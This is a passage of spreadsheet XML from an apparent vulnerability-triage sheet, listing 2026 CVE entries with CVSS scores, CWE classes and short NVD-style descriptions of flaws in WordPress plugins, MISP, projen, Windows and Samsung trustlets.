        <v>6.9</v>
      </c>
      <c r="E603" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F603" s="5" t="inlineStr">
        <is>
          <t>ics-cert@hq.dhs.gov</t>
        </is>
      </c>
      <c r="G603" s="5" t="inlineStr"/>
      <c r="H603" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I603" s="5" t="inlineStr"/>
      <c r="J603" s="5" t="inlineStr"/>
      <c r="K603" s="5" t="inlineStr"/>
      <c r="L603" s="5" t="inlineStr"/>
      <c r="M603" s="5" t="inlineStr"/>
      <c r="N603" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O603" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P603" s="5" t="inlineStr"/>
      <c r="Q603" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R603" s="5" t="inlineStr">
        <is>
          <t>When a particular authentication mode is configured, the reverse proxy forwards requests for a bundled third-party administrative interface directly to that interface without applying the gateway's own authentication requirement first. All access control for this administrative interface, which manages the credential store used to gate every other service in the deployment, is delegated entirely to that third-party interface's own login mechanism. Any authentication weakness in that bundled interface would compromise the credential store protecting the rest of the deployment.</t>
        </is>
      </c>
      <c r="S603" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90449</t>
        </is>
      </c>
    </row>
    <row r="604">
      <c r="A604" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B604" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C604" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90457</t>
        </is>
      </c>
      <c r="D604" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E604" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F604" s="5" t="inlineStr">
        <is>
          <t>ics-cert@hq.dhs.gov</t>
        </is>
      </c>
      <c r="G604" s="5" t="inlineStr"/>
      <c r="H604" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I604" s="5" t="inlineStr"/>
      <c r="J604" s="5" t="inlineStr"/>
      <c r="K604" s="5" t="inlineStr"/>
      <c r="L604" s="5" t="inlineStr"/>
      <c r="M604" s="5" t="inlineStr"/>
      <c r="N604" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O604" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P604" s="5" t="inlineStr"/>
      <c r="Q604" s="5" t="inlineStr">
        <is>
          <t>CWE-916</t>
        </is>
      </c>
      <c r="R604" s="5" t="inlineStr">
        <is>
          <t>The administrative password is hashed using a comparatively weak, fast algorithm for the credential store backing one authentication path, and the file containing that hash is written with permissions allowing it to be read by any local user. This is inconsistent with a separate, stronger hashing algorithm used for the same password on another authentication path. A party able to read this file, including a local user or a party with access to a configuration backup, could feasibly recover the underlying password through offline computation, compromising the administrative credential across every path that accepts it.</t>
        </is>
      </c>
      <c r="S604" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90457</t>
        </is>
      </c>
    </row>
    <row r="605">
      <c r="A605" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B605" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C605" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15710</t>
        </is>
      </c>
      <c r="D605" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E605" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F605" s="5" t="inlineStr">
        <is>
          <t>psirt@netskope.com</t>
        </is>
      </c>
      <c r="G605" s="5" t="inlineStr"/>
      <c r="H605" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I605" s="5" t="inlineStr"/>
      <c r="J605" s="5" t="inlineStr"/>
      <c r="K605" s="5" t="inlineStr"/>
      <c r="L605" s="5" t="inlineStr"/>
      <c r="M605" s="5" t="inlineStr"/>
      <c r="N605" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O605" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P605" s="5" t="inlineStr"/>
      <c r="Q605" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="R605" s="5" t="inlineStr">
        <is>
          <t>An information leakage vulnerability exists in the Endpoint DLP component (epdlpdrv.sys) of Netskope Client for Windows prior to version R141. An internal communication channel used by the user-space hook DLL to pass messages through the kernel driver to the daemon lacked proper token-based message validation, allowing local unprivileged processes to send unauthorized queries. Additionally, a reply buffer used by the port message handler was not properly initialized before returning data, leaking residual kernel pool memory from prior allocations. A local unprivileged attacker could exploit this vulnerability to enumerate DLP configuration and feature flags, extract live session tokens, and read kernel memory fragments from other users' operations.</t>
        </is>
      </c>
      <c r="S605" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15710</t>
        </is>
      </c>
    </row>
    <row r="606">
      <c r="A606" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B606" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C606" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69415</t>
        </is>
      </c>
      <c r="D606" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E606" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F606" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G606" s="5" t="inlineStr"/>
      <c r="H606" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I606" s="5" t="inlineStr"/>
      <c r="J606" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K606" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L606" s="5" t="inlineStr"/>
      <c r="M606" s="5" t="inlineStr"/>
      <c r="N606" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O606" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P606" s="5" t="inlineStr"/>
      <c r="Q606" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R606" s="5" t="inlineStr">
        <is>
          <t>Missing authentication for critical function in Windows DHCP Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S606" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69415</t>
        </is>
      </c>
    </row>
    <row r="607">
      <c r="A607" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B607" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C607" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78451</t>
        </is>
      </c>
      <c r="D607" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E607" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F607" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G607" s="5" t="inlineStr"/>
      <c r="H607" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I607" s="5" t="inlineStr"/>
      <c r="J607" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K607"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607" s="5" t="inlineStr"/>
      <c r="M607" s="5" t="inlineStr"/>
      <c r="N607" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O607" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P607" s="5" t="inlineStr"/>
      <c r="Q607" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="R607" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Microsoft Windows SCSI Class System File allows an unauthorized attacker to elevate privileges with a physical attack.</t>
        </is>
      </c>
      <c r="S607" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78451</t>
        </is>
      </c>
    </row>
    <row r="608">
      <c r="A608" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B608" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C608" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83545</t>
        </is>
      </c>
      <c r="D608" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E608" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F608" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G608" s="5" t="inlineStr"/>
      <c r="H608" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I608" s="5" t="inlineStr"/>
      <c r="J608" s="5" t="inlineStr"/>
      <c r="K608" s="5" t="inlineStr"/>
      <c r="L608" s="5" t="inlineStr"/>
      <c r="M608" s="5" t="inlineStr"/>
      <c r="N608" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O608" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P608" s="5" t="inlineStr"/>
      <c r="Q608" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R608" s="5" t="inlineStr">
        <is>
          <t>The CoolClock WordPress plugin before 4.3.8 does not properly escape a custom skin setting before outputting it inside an inline script, allowing users with contributor-level access and above to inject arbitrary JavaScript that executes when the content is viewed.</t>
        </is>
      </c>
      <c r="S608" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83545</t>
        </is>
      </c>
    </row>
    <row r="609">
      <c r="A609" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B609" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C609" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83546</t>
        </is>
      </c>
      <c r="D609" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E609" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F609" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G609" s="5" t="inlineStr"/>
      <c r="H609" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I609" s="5" t="inlineStr"/>
      <c r="J609" s="5" t="inlineStr"/>
      <c r="K609" s="5" t="inlineStr"/>
      <c r="L609" s="5" t="inlineStr"/>
      <c r="M609" s="5" t="inlineStr"/>
      <c r="N609" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O609" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P609" s="5" t="inlineStr"/>
      <c r="Q609" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R609" s="5" t="inlineStr">
        <is>
          <t>The CoolClock WordPress plugin before 4.3.8 does not properly escape a skin setting before outputting it within an HTML attribute, allowing users with contributor-level access and above to inject arbitrary web scripts that execute when the content is viewed.</t>
        </is>
      </c>
      <c r="S609" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83546</t>
        </is>
      </c>
    </row>
    <row r="610">
      <c r="A610" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B610" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C610" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85238</t>
        </is>
      </c>
      <c r="D610" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E610" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F610" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G610" s="5" t="inlineStr"/>
      <c r="H610" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I610" s="5" t="inlineStr"/>
      <c r="J610" s="5" t="inlineStr"/>
      <c r="K610" s="5" t="inlineStr">
        <is>
          <t>misp-project:misp</t>
        </is>
      </c>
      <c r="L610" s="5" t="inlineStr"/>
      <c r="M610" s="5" t="inlineStr"/>
      <c r="N610" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O610" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P610" s="5" t="inlineStr"/>
      <c r="Q610" s="5" t="inlineStr">
        <is>
          <t>CWE-384</t>
        </is>
      </c>
      <c r="R610" s="5" t="inlineStr">
        <is>
          <t>MISP contains a session fixation vulnerability in the CustomAuth authentication (a custom configuration) flow. When a user was successfully authenticated through CustomAuth, MISP stored the authenticated user identity in the existing session without first rotating the session identifier.
As a result, if an attacker can cause a victim to use a session identifier known to the attacker before authentication, that same session identifier remains valid after the victim successfully authenticates. The attacker could subsequently reuse the fixed session identifier to access the victim's authenticated MISP session, potentially gaining the privileges associated with the victim's account.
The issue occurs because __customAuthentication() wrote the authenticated user into the existing CakePHP session while the call to Session-&gt;renew() had previously been disabled. The patch restores session identifier rotation when a new authentication occurs or when the authenticated user changes, while avoiding unnecessary session renewal on every request.</t>
        </is>
      </c>
      <c r="S610" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85238</t>
        </is>
      </c>
    </row>
    <row r="611">
      <c r="A611" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B611" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C611" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85678</t>
        </is>
      </c>
      <c r="D611" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E611" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F611" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G611" s="5" t="inlineStr"/>
      <c r="H611" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I611" s="5" t="inlineStr"/>
      <c r="J611" s="5" t="inlineStr"/>
      <c r="K611" s="5" t="inlineStr"/>
      <c r="L611" s="5" t="inlineStr"/>
      <c r="M611" s="5" t="inlineStr"/>
      <c r="N611" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O611" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P611" s="5" t="inlineStr"/>
      <c r="Q611" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R611" s="5" t="inlineStr">
        <is>
          <t>The AI Builder  WordPress plugin before 2.7.8 does not sanitise custom JavaScript saved against a post before echoing it inside a script tag on the front end, allowing users with contributor level access and above to store arbitrary JavaScript that will execute in the browser of anyone who views the post, including the editor or administrator who reviews it.</t>
        </is>
      </c>
      <c r="S611" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85678</t>
        </is>
      </c>
    </row>
    <row r="612">
      <c r="A612" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B612" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C612" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86780</t>
        </is>
      </c>
      <c r="D612" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E612" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F612" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G612" s="5" t="inlineStr"/>
      <c r="H612" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I612" s="5" t="inlineStr"/>
      <c r="J612" s="5" t="inlineStr"/>
      <c r="K612" s="5" t="inlineStr"/>
      <c r="L612" s="5" t="inlineStr"/>
      <c r="M612" s="5" t="inlineStr"/>
      <c r="N612" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O612" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P612" s="5" t="inlineStr"/>
      <c r="Q612" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R612" s="5" t="inlineStr">
        <is>
          <t>The Featured Image with URL WordPress plugin before 1.0.6 does not sanitise and escape a stored image attribute value before outputting it, which could allow users with a role as low as Contributor to perform Stored Cross-Site Scripting attacks that execute in the browser of any user viewing the affected post, including higher-privileged users such as Editors and Administrators.</t>
        </is>
      </c>
      <c r="S612" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86780</t>
        </is>
      </c>
    </row>
    <row r="613">
      <c r="A613" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B613" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C613" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89065</t>
        </is>
      </c>
      <c r="D613" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E613" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F613" s="5" t="inlineStr">
        <is>
          <t>ff89ba41-3aa1-4d27-914a-91399e9639e5</t>
        </is>
      </c>
      <c r="G613" s="5" t="inlineStr"/>
      <c r="H613" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I613" s="5" t="inlineStr"/>
      <c r="J613" s="5" t="inlineStr"/>
      <c r="K613" s="5" t="inlineStr"/>
      <c r="L613" s="5" t="inlineStr"/>
      <c r="M613" s="5" t="inlineStr"/>
      <c r="N613" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O613" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P613" s="5" t="inlineStr"/>
      <c r="Q613" s="5" t="inlineStr">
        <is>
          <t>CWE-23</t>
        </is>
      </c>
      <c r="R613" s="5" t="inlineStr">
        <is>
          <t>Relative path traversal in the generated file manifest cleanup component in projen before 0.101.37 might allow context-dependent attackers to recursively delete files and directories outside the project directory that are writable by the environment running projen, via crafted entries in the version-controlled generated file manifest that is consumed during project synthesis.
To remediate this issue, users should upgrade to version 0.101.37. The corrected containment check is automatically applied by the projen runtime next time you run it.</t>
        </is>
      </c>
      <c r="S613" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89065</t>
        </is>
      </c>
    </row>
    <row r="614">
      <c r="A614" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B614" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C614" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21085</t>
        </is>
      </c>
      <c r="D614" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="E614" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F614" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G614" s="5" t="inlineStr"/>
      <c r="H614" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I614" s="5" t="inlineStr"/>
      <c r="J614" s="5" t="inlineStr"/>
      <c r="K614" s="5" t="inlineStr">
        <is>
          <t>samsung:android</t>
        </is>
      </c>
      <c r="L614" s="5" t="inlineStr"/>
      <c r="M614" s="5" t="inlineStr"/>
      <c r="N614" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O614" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P614" s="5" t="inlineStr"/>
      <c r="Q614" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R614" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds write in Keymaster trustlet prior to SMR Sep-2026 Release 1 allows local privileged attackers to write out-of-bounds memory.</t>
        </is>
      </c>
      <c r="S614" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21085</t>
        </is>
      </c>
    </row>
    <row r="615">
      <c r="A615" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B615" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C615" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21093</t>
        </is>
      </c>
      <c r="D615" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="E615" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F615" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G615" s="5" t="inlineStr"/>
      <c r="H615" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I615" s="5" t="inlineStr"/>
      <c r="J615" s="5" t="inlineStr"/>
      <c r="K615" s="5" t="inlineStr">
        <is>
          <t>samsung:android</t>
        </is>
      </c>
      <c r="L615" s="5" t="inlineStr"/>
      <c r="M615" s="5" t="inlineStr"/>
      <c r="N615" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O615" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P615" s="5" t="inlineStr"/>
      <c r="Q615" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R615" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in PROCA trustlet prior to SMR Sep-2026 Release 1 allows local privileged attackers to write out-of-bounds memory.</t>
        </is>
      </c>
      <c r="S615" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21093</t>
        </is>
      </c>
    </row>
    <row r="616">
      <c r="A616" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B616" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C616" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21101</t>
        </is>
      </c>
      <c r="D616" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="E616" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F616" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G616" s="5" t="inlineStr"/>
      <c r="H616" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I616" s="5" t="inlineStr"/>
      <c r="J616" s="5" t="inlineStr"/>
      <c r="K616" s="5" t="inlineStr">
        <is>
          <t>samsung:android</t>
        </is>
      </c>
      <c r="L616" s="5" t="inlineStr"/>
      <c r="M616" s="5" t="inlineStr"/>
      <c r="N616" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O616" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P616" s="5" t="inlineStr"/>
      <c r="Q616" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="R616" s="5" t="inlineStr">
        <is>
          <t>Improper input validation in DualDAR driver prior to SMR Sep-2026 Release 1 allows local privileged attackers to potentially execute arbitrary code with root privilege.</t>
        </is>
      </c>
      <c r="S616" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21101</t>
        </is>
      </c>
    </row>
    <row r="617">
      <c r="A617" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B617" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C617" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21102</t>
        </is>
      </c>
      <c r="D617" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="E617" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F617" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G617" s="5" t="inlineStr"/>
      <c r="H617" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I617" s="5" t="inlineStr"/>
      <c r="J617" s="5" t="inlineStr"/>
      <c r="K617" s="5" t="inlineStr">
        <is>
          <t>samsung:android</t>
        </is>
      </c>
      <c r="L617" s="5" t="inlineStr"/>
      <c r="M617" s="5" t="inlineStr"/>
      <c r="N617" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O617" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P617" s="5" t="inlineStr"/>
      <c r="Q617" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R617" s="5" t="inlineStr">
        <is>
          <t>Use after free in DualDAR prior to SMR Sep-2026 Release 1 allows local privileged attackers to execute arbitrary code with root privilege.</t>
        </is>
      </c>
      <c r="S617" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21102</t>
        </is>
      </c>
    </row>
    <row r="618">
      <c r="A618" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B618" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C618" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21104</t>
        </is>
      </c>
      <c r="D618" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="E618" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F618" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G618" s="5" t="inlineStr"/>
      <c r="H618" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I618" s="5" t="inlineStr"/>
      <c r="J618" s="5" t="inlineStr"/>
      <c r="K618" s="5" t="inlineStr">
        <is>
          <t>samsung:android</t>
        </is>
      </c>
      <c r="L618" s="5" t="inlineStr"/>
      <c r="M618" s="5" t="inlineStr"/>
      <c r="N618" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O618" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P618" s="5" t="inlineStr"/>
      <c r="Q618" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R618" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in KnoxVault trustlet prior to SMR Sep-2026 Release 1 allows local privileged attackers to execute arbitrary code.</t>
        </is>
      </c>
      <c r="S618" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21104</t>
        </is>
      </c>
    </row>
    <row r="619">
      <c r="A619" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B619" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C619" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89332</t>
        </is>
      </c>
      <c r="D619" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="E619" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F619" s="5" t="inlineStr">
        <is>
          <t>ff89ba41-3aa1-4d27-914a-91399e9639e5</t>
        </is>
      </c>
      <c r="G619" s="5" t="inlineStr"/>
      <c r="H619" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I619" s="5" t="inlineStr"/>
      <c r="J619" s="5" t="inlineStr"/>
      <c r="K619" s="5" t="inlineStr">
        <is>
          <t>amazon:kiro_ide</t>
        </is>
      </c>
      <c r="L619" s="5" t="inlineStr"/>
      <c r="M619" s="5" t="inlineStr"/>
      <c r="N619" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O619" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P619" s="5" t="inlineStr"/>
      <c r="Q619" s="5" t="inlineStr">
        <is>
          <t>CWE-201, CWE-829</t>
        </is>
      </c>
      <c r="R619" s="5" t="inlineStr">
        <is>
